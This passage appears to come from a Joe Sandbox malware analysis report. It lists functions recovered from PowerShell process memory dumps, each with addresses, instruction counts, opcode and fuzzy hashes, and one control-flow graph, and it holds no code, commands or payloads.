                                                                • Opcode ID: 50ddeb87d77cf6d19400d694ce9548c14ed51bb4a2cfe442c8ff93775428ae63
                                                                • Instruction ID: 463aaef25c1609f59119b6335416f9db79d1e211283212608122daca7bf3d763
                                                                • Opcode Fuzzy Hash: 50ddeb87d77cf6d19400d694ce9548c14ed51bb4a2cfe442c8ff93775428ae63
                                                                • Instruction Fuzzy Hash: 2921AE71E042588FCB14DFAED40469EBFF5EB89320F24846AD419E7340CA75A906CBA5
                                                                Function 04F629F0 Relevance: .2, Instructions: 210COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 887 4f629f0-4f62a1e 888 4f62a24-4f62a3a 887->888 889 4f62af5-4f62b37 887->889 890 4f62a3f-4f62a52 888->890 891 4f62a3c 888->891 893 4f62c51-4f62c61 889->893 894 4f62b3d-4f62b56 889->894 890->889 898 4f62a58-4f62a65 890->898 891->890 896 4f62b5b-4f62b69 894->896 897 4f62b58 894->897 896->893 904 4f62b6f-4f62b79 896->904 897->896 900 4f62a67 898->900 901 4f62a6a-4f62a7c 898->901 900->901 901->889 905 4f62a7e-4f62a88 901->905 906 4f62b87-4f62b94 904->906 907 4f62b7b-4f62b7d 904->907 908 4f62a96-4f62aa6 905->908 909 4f62a8a-4f62a8c 905->909 906->893 910 4f62b9a-4f62baa 906->910 907->906 908->889 911 4f62aa8-4f62ab2 908->911 909->908 912 4f62baf-4f62bbd 910->912 913 4f62bac 910->913 914 4f62ab4-4f62ab6 911->914 915 4f62ac0-4f62af4 911->915 912->893 917 4f62bc3-4f62bd3 912->917 913->912 914->915 919 4f62bd5 917->919 920 4f62bd8-4f62be5 917->920 919->920 920->893 923 4f62be7-4f62bf7 920->923 924 4f62bfc-4f62c08 923->924 925 4f62bf9 923->925 924->893 927 4f62c0a-4f62c24 924->927 925->924 928 4f62c26 927->928 929 4f62c29 927->929 928->929 930 4f62c2e-4f62c38 929->930 931 4f62c3d-4f62c50 930->931
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4f5092e53198f759e33dd34468b2a179484bc6f38eb6fda833c421000967d910
                                                                • Instruction ID: 6ddeccca18648362859947125af692739bb3ae950d09c98667540f457eb52e30
                                                                • Opcode Fuzzy Hash: 4f5092e53198f759e33dd34468b2a179484bc6f38eb6fda833c421000967d910
                                                                • Instruction Fuzzy Hash: 60917CB4A002458FCB15DF59C4949AEFBB1FF48310B258599D816AB365C735FC52CFA0
                                                                Function 04F6BAC0 Relevance: .2, Instructions: 155COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a3afc4c39f6e06896bbcc095d9cec155843125f78c5ef45426ef78628ab9924
                                                                • Instruction ID: 1df99a0422e32c37803f26902bf92a707f764d71f52cd2a4dc681ca64bfb1f7d
                                                                • Opcode Fuzzy Hash: 2a3afc4c39f6e06896bbcc095d9cec155843125f78c5ef45426ef78628ab9924
                                                                • Instruction Fuzzy Hash: 3E61F7B1E002589FCB14DFA9D584B9DFBF5EF88310F188169E819AB354EB34A945CB50
                                                                Function 04F67740 Relevance: .2, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e27f4c233f16acd2816c13a14aaa00eac4889a09bcf567ff6cf50f17bef91653
                                                                • Instruction ID: b4b6a3d29881f472392a3fc66fb7d7b6bde6e762ab649bb0dfaf1a75a94c0d65
                                                                • Opcode Fuzzy Hash: e27f4c233f16acd2816c13a14aaa00eac4889a09bcf567ff6cf50f17bef91653
                                                                • Instruction Fuzzy Hash: C851BF357042019FD714EB79D844A2AB7EAFFC8219F248479E50ACB351EB35EC02CBA0
                                                                Function 04F6BAB0 Relevance: .2, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4e337aa6e886b18bacf9c5a502e955d911f9c6d7b298631d40fa5f61b92f2178
                                                                • Instruction ID: 78616715dd628af1ee51945518bc697b23858776c575a4048127f3529a13927e
                                                                • Opcode Fuzzy Hash: 4e337aa6e886b18bacf9c5a502e955d911f9c6d7b298631d40fa5f61b92f2178
                                                                • Instruction Fuzzy Hash: FF5127B1E002589FCB14DFA9D584A9DFFF5EF88310F188069E819EB364EB34A945CB50
                                                                Function 04F6E391 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f53ede8f23c9b99451e498bbb9d88f6944490182e2ddd67d65b96c36c95f3b5
                                                                • Instruction ID: 622248365a958f0bf3814fee85e6733c589a24c88d9455edfd7a83f4446b9ffa
                                                                • Opcode Fuzzy Hash: 5f53ede8f23c9b99451e498bbb9d88f6944490182e2ddd67d65b96c36c95f3b5
                                                                • Instruction Fuzzy Hash: 054163B8B402058FDB10DF7CD59496ABBE6EF88304B158069E549CF369EB34EC028B51
                                                                Function 04F6E3A0 Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49511e9ccb6d72dd10b5d8f4907d77fdd85c390b71c8c2c6a3674c66f634b7ee
                                                                • Instruction ID: a39b96e25a49bcea5ab0afed6c78efaba61c4aa0f19196cf0794d7f1b894d5f4
                                                                • Opcode Fuzzy Hash: 49511e9ccb6d72dd10b5d8f4907d77fdd85c390b71c8c2c6a3674c66f634b7ee
                                                                • Instruction Fuzzy Hash: 8F4143B8B502058FDB10DF7CC59496ABBE6EF88304B158469F949DF369EB34EC028B51
                                                                Function 07E23CCD Relevance: .1, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5eaaba038237de39218d4fab7a55479177e3b2ddb38c1500e463fe14c5b1c0f4
                                                                • Instruction ID: e10cafadc7807f86680e052f7e62f68f6272ca3c302d13549b4cafb4a7882659
                                                                • Opcode Fuzzy Hash: 5eaaba038237de39218d4fab7a55479177e3b2ddb38c1500e463fe14c5b1c0f4
                                                                • Instruction Fuzzy Hash: 6D4127F0A023229BCB25CB25C501EA6BBA3AF80758F1450A6D901CF655D739DD8ADFA1
                                                                Function 04F62B00 Relevance: .1, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80759eaa2244f5ad36f9ec5e9ce5f637c2bfe2478b3060506ff90de52daeae59
                                                                • Instruction ID: 63e8586c6da7546c01c93fad43c3632a2d1adac137bf87980511af63f269980d
                                                                • Opcode Fuzzy Hash: 80759eaa2244f5ad36f9ec5e9ce5f637c2bfe2478b3060506ff90de52daeae59
                                                                • Instruction Fuzzy Hash: 0A4129B4A005059FCB09DF59C5989AEFBB1FF48310B168599D816AB364C736FC52CFA0
                                                                Function 04F66FB0 Relevance: .1, Instructions: 105COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d63b878a113f01ef7d4ad801318424436f3127af69d8ec8b4b296726e4c48019
                                                                • Instruction ID: aca319557d359e2bdc33e87e53aa6add747bd93396a9f8af6c13dbc704697c6f
                                                                • Opcode Fuzzy Hash: d63b878a113f01ef7d4ad801318424436f3127af69d8ec8b4b296726e4c48019
                                                                • Instruction Fuzzy Hash: 9631B534B042049FDB04DFA8C558AAEBBF1AF8D314F148099D842AB355DB36EC02CB20
                                                                Function 04F6C388 Relevance: .1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 542293ec870f9521d113e1534b7ac45c2c7d9d877602767a2d003e554f94b64f
                                                                • Instruction ID: 67533b35f9e7135efa90a58b088247d4d62ffa803669b487700b4c5032557bb1
                                                                • Opcode Fuzzy Hash: 542293ec870f9521d113e1534b7ac45c2c7d9d877602767a2d003e554f94b64f
                                                                • Instruction Fuzzy Hash: 2931AE353002009FD705EB78E844B9AF7A2EFC4314F048239E64ACB364DF75A846CBA1
                                                                Function 04F6AE60 Relevance: .1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8972f8d4f283d07f578e2359ba3b4be24df77377e04482401d56365b36c2159
                                                                • Instruction ID: 1125b9b4522a8c81782c444f3999cc278d22fbf1c0d12f019ab8aec682e8e2cc
                                                                • Opcode Fuzzy Hash: e8972f8d4f283d07f578e2359ba3b4be24df77377e04482401d56365b36c2159
                                                                • Instruction Fuzzy Hash: 8A315EB0E002099FDB08DFA9D4957AE7FF6EF89310F148069E406E7754EB349C428B91
                                                                Function 04F6AD28 Relevance: .1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9192cde7845511316f42911c07656a556b5176c364ca79fb5827fd36ba9fa62f
                                                                • Instruction ID: aeaa665faccafb8f6b2d7b6ce9ccaded296ef26960be2bfd07309368310b7a1b
                                                                • Opcode Fuzzy Hash: 9192cde7845511316f42911c07656a556b5176c364ca79fb5827fd36ba9fa62f
                                                                • Instruction Fuzzy Hash: FC3192B8A002099FDB05DFA4D854BFEB7B6EF85300F218479E515AF394DA389D018FA1
                                                                Function 04F6DFC0 Relevance: .1, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c28723216782628a7ec3eea726631850723ac3ed7099a80a26d1ccc8d2bae424
                                                                • Instruction ID: e685436525cdaa4ebc29a52293c0f852162039f484a56b0fb1dc342f28de72ab
                                                                • Opcode Fuzzy Hash: c28723216782628a7ec3eea726631850723ac3ed7099a80a26d1ccc8d2bae424
                                                                • Instruction Fuzzy Hash: 12315A75A00204AFCB14DF69E458AADBBF2AF88714F245529E402EB354DB31AC45CB90
                                                                Function 04F6AE70 Relevance: .1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8c91c8963cf712d84d455b49f7864fe622344d2d49782b8446e635229abdb48
                                                                • Instruction ID: 01f3d2cc36c4a5f9d6a3969e24debed6e4efb7dfdc7c5867c5b3c52d41129d89
                                                                • Opcode Fuzzy Hash: d8c91c8963cf712d84d455b49f7864fe622344d2d49782b8446e635229abdb48
                                                                • Instruction Fuzzy Hash: 75314170E002099FDB08DFA9D5947AE7BF6EF89350F148069E406F7354EB749C428B51
                                                                Function 04F693F0 Relevance: .1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99fbadb20d7397ef2c7d52d00072c992fe373b145202fe91a598cffa37c911a9
                                                                • Instruction ID: a0aec9f08c5516b4cb5872478e85662d402c450a1aca16d413a66dbc9b0f6ee3
                                                                • Opcode Fuzzy Hash: 99fbadb20d7397ef2c7d52d00072c992fe373b145202fe91a598cffa37c911a9
                                                                • Instruction Fuzzy Hash: F7318EB5D017448EDB60CF6AD4887DAFBF2EF88320F28C41ED85E97255D6B46482CB61
                                                                Function 04F6AD38 Relevance: .1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4eb85f7a3d024894fefbca809a1d1811983bc7d85d8a1be2f943f5b1f6ba77d8
                                                                • Instruction ID: ff0c2b8ccb810e1189d12abd18549e9d122d7e4deb2d178d3b826c3742089423
                                                                • Opcode Fuzzy Hash: 4eb85f7a3d024894fefbca809a1d1811983bc7d85d8a1be2f943f5b1f6ba77d8
                                                                • Instruction Fuzzy Hash: 3A3152B8E002099FDB04EFA4D854BBEB7B2EF84704F218479D515AB394DA75DD018FA4
                                                                Function 04F6DFD0 Relevance: .1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 85515e22bd0f348ca5a3de2afa856f0196d81c3373d890960b24abbfaf3fb9c7
                                                                • Instruction ID: 05e7ce8c190c25d11a4afa27e042e8c8e7dcc2d51e20e25871db73d3ef4eae53
                                                                • Opcode Fuzzy Hash: 85515e22bd0f348ca5a3de2afa856f0196d81c3373d890960b24abbfaf3fb9c7
                                                                • Instruction Fuzzy Hash: 30314735A00204AFCB14EF69D458A9EBBF2AF8C714F245529E402EB394DF71AC45CB90
                                                                Function 0365F3D8 Relevance: .1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704681818.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2242505ae4adc2c999fee8783463616265a3724e8e90f33f27da778259a0a4f8
                                                                • Instruction ID: 9b2fba8c332a4ed3cc1960e905bfffa6e053f5ad9e16d27e5b42d43de8a7719a
                                                                • Opcode Fuzzy Hash: 2242505ae4adc2c999fee8783463616265a3724e8e90f33f27da778259a0a4f8
                                                                • Instruction Fuzzy Hash: 8521BC72608200EFCB05DF14DA80B2ABBA5EB88314F24C5A9ED094E256C73AD456CBA1
                                                                Function 0365F02C Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704681818.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c9a5d0181bbf71ce0c526658c27f50747aa47d7b53ab4f6ba77f049c103a8f47
                                                                • Instruction ID: 319cb91e9d1b51157a870df28de23ac35da610823deb445ceed66d7159d59813
                                                                • Opcode Fuzzy Hash: c9a5d0181bbf71ce0c526658c27f50747aa47d7b53ab4f6ba77f049c103a8f47
                                                                • Instruction Fuzzy Hash: 8721F276604240DFCB14DF24DAD4B26BFA5EB84324F28C5B9ED0A4F356C37AD446CA61
                                                                Function 04F69400 Relevance: .1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1f69c6b35f56ffcc6a8095775cb80543aaf135696b8d676bc220dee72f0d03d
                                                                • Instruction ID: d8c33a74973129bd80907a8315773b08313abfe657b27e0ae1ad96108889fdc3
                                                                • Opcode Fuzzy Hash: f1f69c6b35f56ffcc6a8095775cb80543aaf135696b8d676bc220dee72f0d03d
                                                                • Instruction Fuzzy Hash: 1C217EB1D017448EDB60CF6AC48878AFFF2EF88320F28C41ED85E97245D6B46481CB61
                                                                Function 04F6DCD9 Relevance: .1, Instructions: 64COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 628eb08217fcf29c0be794a65989d2a2524819d60be5f4d19c198488de8f2532
                                                                • Instruction ID: 0d7bfd89ab08b8c01abb3eb93c88ee58ac6b1ef8a39083f425b83de2c92e11a4
                                                                • Opcode Fuzzy Hash: 628eb08217fcf29c0be794a65989d2a2524819d60be5f4d19c198488de8f2532
                                                                • Instruction Fuzzy Hash: 5111EF72B051449FCB05EB79E8045ECBBB2EFC9321B1480AAE416D7351DA34AC46CBA1
                                                                Function 04F6767C Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cae9974211023e4c7200b7cc6bdc3157ebd9325b4b88710494811d0e34e30425
                                                                • Instruction ID: 341560e6c7ba35eb3ed686a598c0f7a233572f4c017f7f2c6b2501cc39d9f50f
                                                                • Opcode Fuzzy Hash: cae9974211023e4c7200b7cc6bdc3157ebd9325b4b88710494811d0e34e30425
                                                                • Instruction Fuzzy Hash: CF112139B001148FCF04EBACD940ADD77F6EBC8265B1440A5E509EB324DB35EC068B90
                                                                Function 0365F3D3 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704681818.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                • Instruction ID: eac7cb745a72e392ed4df1a0d0f421d8c1d1963826434984f5729898af986a87
                                                                • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                • Instruction Fuzzy Hash: 0B215876504240DFCB06CF10DAC4B16BB62FB88214F28C5A9ED494E656C33AD46ACBA1
                                                                Function 0365F027 Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704681818.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                • Instruction ID: 81fc3fccf1feded23c3cb260cf00ea0cdf070454ed0eafe1b1bdf9f154695837
                                                                • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                • Instruction Fuzzy Hash: 4A11A976504280CFCB11CF14D694B15BFA1EB84228F28C6AAEC094F756C33AD44ACB61
                                                                Function 04F6BCE0 Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e82958ba417910b70b88f5d54d96edd67c97510ca3dbeb3a67724bb439872161
                                                                • Instruction ID: 6a5538940786a84e1c27f836b4536a73ef0663efef732f2ce2f9899310ea1b76
                                                                • Opcode Fuzzy Hash: e82958ba417910b70b88f5d54d96edd67c97510ca3dbeb3a67724bb439872161
                                                                • Instruction Fuzzy Hash: E401D2316083449FD718CF75D594A9A7FE4AF45210F2488EEE09ACB6A2CA30FC42C701
                                                                Function 04F6DE98 Relevance: .0, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee8bf2efedd5565146c4e88da6af1ae000035dc06353738c606ac88f7aee44ad
                                                                • Instruction ID: f549bdf632f5089726bf46fb5aff564daf193cf73e38af902f55449dfa632eab
                                                                • Opcode Fuzzy Hash: ee8bf2efedd5565146c4e88da6af1ae000035dc06353738c606ac88f7aee44ad
                                                                • Instruction Fuzzy Hash: 75019E35B002148FCB119F74E818AAEBBF5FB89315F044069E91AD3341DB36A911CF90
                                                                Function 0365D005 Relevance: .0, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704681818.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 083d0047c623ab156622320afe91903e9088faadf4d837285652611d6ff6823b
                                                                • Instruction ID: 5de1cef175f449ab555020a4f104bbf77ae65a4c587a0b4db4e8fabbe77c3820
                                                                • Opcode Fuzzy Hash: 083d0047c623ab156622320afe91903e9088faadf4d837285652611d6ff6823b
                                                                • Instruction Fuzzy Hash: 16012D6240D3C05FD7128B258D94652BFB8DF43224F1D84DBEC888F297C2695C45C771
                                                                Function 04F6BF10 Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7fa169e109e1583887efaadf1f53ee4db50202d921aae09a4ef469b5274c9f7a
                                                                • Instruction ID: bbecca74031b51296a442aec73ae432f81e20abdad4ff4d7e96e25a6ba9f902f
                                                                • Opcode Fuzzy Hash: 7fa169e109e1583887efaadf1f53ee4db50202d921aae09a4ef469b5274c9f7a
                                                                • Instruction Fuzzy Hash: E6F046723093A02FD7008A7A9C549B7BFEDEF86620B0540BBF840C73A2CA70CD0087A0
                                                                Function 0365D01D Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704681818.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de16b2513f83eda90427cdcccbe8a5b7c2940013b7224a8ac9730660a02dd22c
                                                                • Instruction ID: 4440e84841b25349b0d887d56feb1b79acd077fd93152214e740dea798b40df7
                                                                • Opcode Fuzzy Hash: de16b2513f83eda90427cdcccbe8a5b7c2940013b7224a8ac9730660a02dd22c
                                                                • Instruction Fuzzy Hash: F701A272409340AAE710CE29CA84B67FF98EF41324F1CC57AFD584B386C6799886C6B1
                                                                Function 04F6F7B9 Relevance: .0, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 417cea1983773a56572de8f25a15cfabb91e552e310d134fb3bd119d4e6ed442
                                                                • Instruction ID: f717f30fd8ff13b09d8d7871e978e322dc24997ba9c48afebc77a247ed53b8ff
                                                                • Opcode Fuzzy Hash: 417cea1983773a56572de8f25a15cfabb91e552e310d134fb3bd119d4e6ed442
                                                                • Instruction Fuzzy Hash: D901E9B2D4074ADBCB04CFE4C9456EDFBB0FF99300F20471AD015A6605EBB066868B91
                                                                Function 04F6DC88 Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
